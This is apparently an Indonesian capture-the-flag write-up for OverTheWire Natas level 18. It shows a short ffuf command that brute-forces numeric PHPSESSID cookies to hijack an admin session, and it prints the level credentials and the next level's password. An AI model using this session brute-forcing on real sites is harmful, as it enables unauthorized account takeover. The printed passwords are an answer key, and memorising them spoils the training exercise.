Writeup Aria
Natas

Level 18

soal

Username: natas18 URL: http://natas18.natas.labs.overthewire.org

solve

  • login with cred natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ
  • terdapat web yang dimana login admin ditentukan oleh value cookie=<angka_random> dari 1-640
  • jadi kita hanya perlu melakukan brute force fuzzing saja dengan ffuf
  • buat terlebih dahulu wordlistnya 1 - 640
    seq 1 640 > /tmp/ids.txt
  • bruteforce fuzz
    ffuf -u http://natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ@natas18.natas.labs.overthewire.org/ -H "Cookie: PHPSESSID=FUZZ" -w /tmp/ids.txt -fr "You are logged in as a regular user"
    outputnya: 119
  • lalu tinggal copy paste ke cookie webnya dan berhasil mendapatkan password natas19
     You are an admin. The credentials for the next level are:
     Username: natas19
     Password: tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr

flag

tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr

On this page